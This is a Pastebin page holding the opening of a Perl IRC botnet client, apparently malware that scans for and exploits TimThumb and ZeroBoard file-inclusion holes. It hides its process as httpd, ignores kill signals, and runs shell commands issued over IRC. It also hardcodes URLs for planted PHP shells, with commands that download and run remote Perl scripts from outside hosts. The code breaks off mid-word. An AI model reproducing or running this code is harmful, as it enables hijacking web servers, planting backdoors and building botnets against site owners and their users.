Advertisement
Not a member of Pastebin yet?
Sign Up,
it unlocks many cool features!
- #!/usr/bin/perl
- use HTTP::Request;
- use HTTP::Request::Common;
- use HTTP::Request::Common qw(POST);
- use LWP::Simple;
- use LWP 5.64;
- use LWP::UserAgent;
- use Socket;
- use IO::Socket;
- use IO::Socket::INET;
- use IO::Select;
- use MIME::Base64;
- my $datetime = localtime;
- my $fakeproc = "/usr/sbin/httpd";
- my $ircserver = "black.root-network.org";
- my $ircport = "6667";
- my $nickname = "[iDF]";
- my $ident = "iDF";
- my $channel = "#scan";
- my $admin = "MRC";
- my $fullname = "(8M3R7C5-6T2e11am12.)";
- my $thumblogo = "4,1(8@9TimThumb4)";
- my $zerologo = "4,1(8@9ZeroBoard4)";
- my $thumbcmd = '.timthumb';
- my $zerocmd = '.zero';
- my $thumbshell = "http://picasa.com.my-corner.us/jahat.php";
- my $folder1 = "/cache/d175c74c6a0c5485166403bc61484294.php";
- my $folder2 = "/cache/external_d175c74c6a0c5485166403bc61484294.php";
- my $folder3 = "/temp/d175c74c6a0c5485166403bc61484294.php";
- my $folder4 = "/temp/external_d175c74c6a0c5485166403bc61484294.php";
- my $folder5 = "/wp-content/uploads/thumb-temp/d175c74c6a0c5485166403bc61484294.php";
- my $botid = "http://picasa.com.hackz.name/1/bot.php";
- my $botrun1 = "/cache/f56adc1cc8bc2b8e065db92bf15fca4d.php";
- my $botrun2 = "/cache/external_f56adc1cc8bc2b8e065db92bf15fca4d.php";
- my $botrun3 = "/temp/f56adc1cc8bc2b8e065db92bf15fca4d.php";
- my $botrun4 = "/temp/external_f56adc1cc8bc2b8e065db92bf15fca4d.php";
- my $botrun5 = "/wp-content/uploads/thumb-temp/f56adc1cc8bc2b8e065db92bf15fca4d.php";
- my $action = "/data/shell.php?cmd=lwp-download%20http://blogger.com.ossha.co.il/image.php;lwp-download%20http://flickr.com.guxer.300il.com/l.txt;perl%
- 20l.txt";
- my $action2 = "?cmd=lwp-download%20http://blogger.com.crappyfiles.com/image.php;lwp-download%20-a%20http://guxer.300il.com/l.txt;perl%20l.txt;rm%20l.txt";
- my @bypasser = ("http://www.alexoloughlin.es/google.php",
- "http://estanciadevalencia.com/sn/google.php",
- "http://www.hotelprince.com/google.php");
- my $bypass = $bypasser[rand(scalar(@bypasser))];
- my @uagents = ('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.9.2.12) Gecko/20101026 Firefox/3.6.12',
- 'Mozilla/5.0 (Windows; U; Windows NT 5.1; pl-PL; rv:1.8.1.24pre) Gecko/20100228 K-Meleon/1.5.4',
- 'Mozilla/5.0 (X11; U; Linux i686 (x86_64); en-US; rv:1.9.0.16) Gecko/2009122206 Firefox/3.0.16 Flock/2.5.6',
- 'Mozilla/5.0 (Windows; U; Windows NT 6.0; en-US; rv:1.8.1.8pre) Gecko/20070928 Firefox/2.0.0.7 Navigator/9.0RC1');
- my $uagent = $uagents[rand(scalar(@uagents))];
- $SIG{'INT'} = 'IGNORE';
- $SIG{'HUP'} = 'IGNORE';
- $SIG{'TERM'} = 'IGNORE';
- $SIG{'CHLD'} = 'IGNORE';
- $SIG{'PS'} = 'IGNORE';
- $ircserver = "$ARGV[0]" if $ARGV[0];
- $0 = "$fakeproc"."\0" x 16;
- my $pid = fork;
- exit if $pid;
- die "\n[!] Something Wrong !!!: $!\n\n" unless defined($pid);
- our %irc_servers;
- our %DCC;
- my $dcc_sel = new IO::Select->new();
- $sel_client = IO::Select->new();
- sub sendraw {
- if ($#_ == '1') {
- my $socket = $_[0];
- print $socket "$_[1]\n";
- } else {
- print $IRC_cur_socket "$_[0]\n";
- }
- }
- sub connector {
- my $mynick = $_[0];
- my $ircserver_con = $_[1];
- my $ircport_con = $_[2];
- my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$ircserver_con", PeerPort=>$ircport_con) or return(1);
- if (defined($IRC_socket)) {
- $IRC_cur_socket = $IRC_socket;
- $IRC_socket->autoflush(1);
- $sel_client->add($IRC_socket);
- $irc_servers{$IRC_cur_socket}{'host'} = "$ircserver_con";
- $irc_servers{$IRC_cur_socket}{'port'} = "$ircport_con";
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'myip'} = $IRC_socket->sockhost;
- nick("$mynick");
- my $versi = "0,1(8i3D7F5-6T2e11am12.)";
- sendraw("USER $ident ".$IRC_socket->sockhost." $ircserver_con :$versi");
- sleep (1);}}
- sub parse {
- my $servarg = shift;
- if ($servarg =~ /^PING \:(.*)/) {
- sendraw("PONG :$1");
- }
- elsif ($servarg =~ /^\:(.+?)\!(.+?)\@(.+?)\s+NICK\s+\:(\S+)/i) {
- if (lc($1) eq lc($mynick)) {
- $mynick = $4;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- }
- }
- elsif ($servarg =~ m/^\:(.+?)\s+433/i) {
- nick("$mynick".int rand(1));
- }
- elsif ($servarg =~ m/^\:(.+?)\s+001\s+(\S+)\s/i) {
- $mynick = $2;
- $irc_servers{$IRC_cur_socket}{'nick'} = $mynick;
- $irc_servers{$IRC_cur_socket}{'nome'} = "$1";
- sendraw("MODE $mynick +Bxp");
- sendraw("JOIN $channel");
- sleep(2);
- sendraw("PRIVMSG $admin :Hi $admin im here !!!");
- }
- }
- my $line_temp;
- while( 1 ) {
- while (!(keys(%irc_servers))) { &connector("$nickname", "$ircserver", "$ircport"); }
- select(undef, undef, undef, 0.01);
- delete($irc_servers{''}) if (defined($irc_servers{''}));
- my @ready = $sel_client->can_read(0);
- next unless(@ready);
- foreach $fh (@ready) {
- $IRC_cur_socket = $fh;
- $mynick = $irc_servers{$IRC_cur_socket}{'nick'};
- $nread = sysread($fh, $ircmsg, 4096);
- if ($nread == 0) {
- $sel_client->remove($fh);
- $fh->close;
- delete($irc_servers{$fh});
- }
- @lines = split (/\n/, $ircmsg);
- $ircmsg =~ s/\r\n$//;
- if ($ircmsg =~ /^\:(.+?)\!(.+?)\@(.+?) PRIVMSG (.+?) \:(.+)/) {
- my ($nick,$ident,$host,$path,$msg) = ($1,$2,$3,$4,$5);
- my $engine ="GooGLe,ReDiff,Bing,ALtaViSTa,AsK,UoL,CluSty,GutSer,GooGle2,ByPass,YahOo,BigLobe";
- if ($path eq $mynick) {
- if ($msg =~ /^PING (.*)/) {
- sendraw("NOTICE $nick :PING $1");
- }
- if ($msg =~ /^VERSION/) {
- sendraw("NOTICE $nick :VERSION mIRC v6.17 Khaled Mardam-Bey");
- }
- if ($msg =~ /^TIME/) {
- sendraw("NOTICE $nick :TIME ".$datetime."");
- }
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!nick (.+)/) {
- sendraw("NICK ".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- sendraw($IRC_cur_socket, "PRIVMSG $nick :0,1Fake Process/PID : $fakeproc - $$");
- }
- if (&isAdmin($nick) && $msg !~ /^!/) {
- &shell("$nick","$msg");
- }
- }
- else {
- if (&isAdmin($nick) && $msg eq "!die") {
- &shell("$path","kill -9 $$");
- }
- if (&isAdmin($nick) && $msg eq "!killall") {
- &shell("$path","killall -9 perl");
- }
- if (&isAdmin($nick) && $msg eq "!reset") {
- sendraw("QUIT :Restarting...");
- }
- if (&isAdmin($nick) && $msg =~ /^!join \#(.+)/) {
- sendraw("JOIN #".$1);
- }
- if (&isAdmin($nick) && $msg eq "!part") {
- sendraw("PART $path");
- }
- if (&isAdmin($nick) && $msg =~ /^!part \#(.+)/) {
- sendraw("PART #".$1);
- }
- if (&isAdmin($nick) && $msg =~ /^\.sh (.*)/) {
- &shell("$path","$1");
- }
- if (&isAdmin($nick) && $msg =~ /^$mynick (.*)/) {
- &shell("$path","$1");
- }
- ##################################################################### HELP COMMAND
- if ($msg=~ /^!help/) {
- my $helplogo = "4(8@9Help4)";
- &msg("$path","4$helplogo 8 ###################################################");
- &msg("$path","4$helplogo 8 #9 $thumbcmd [bug] [dork] 9#");
- &msg("$path","4$helplogo 8 #9 $zerocmd [bug] [dork] 9#");
- &msg("$path","4$helplogo 8 ###################################################");
- }
- if ($msg=~ /^!engine/) {
- my $enginelogo = "4(8@9Engine4)";
- &msg("$path","4$enginelogo 8 $engine ");
- }
- if ($msg=~ /^!about/) {
- my $aboutlogo = "15(4@4iDF-Team15)";
- &msg("$path","0,1$aboutlogo 14 TIMTHUMB / ZEROBOARD SCANNER");
- }
- if ($msg=~ /^!respon/ || $msg=~ /^!id/) {
- if (&isFound($thumbshell,"GIF89a")) {
- &msg("$path","0,1(8Injector15)6 PHP Shell 9READY!!!");
- } else {
- &msg("$path","0,1(8Injector15)6 PHP Shell 4LOST!!!");
- }
- }
- if (&isAdmin($nick) && $msg =~ /^!pid/) {
- ¬ice("$nick","0,1Fake Process/PID : 8$fakeproc - $$");
- }
- ##################################################################### RFI SCAN
- if ($msg=~ /^$thumbcmd\s+(.+?)\s+(.*)/) {
- if (my $pid = fork) {
- wa
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement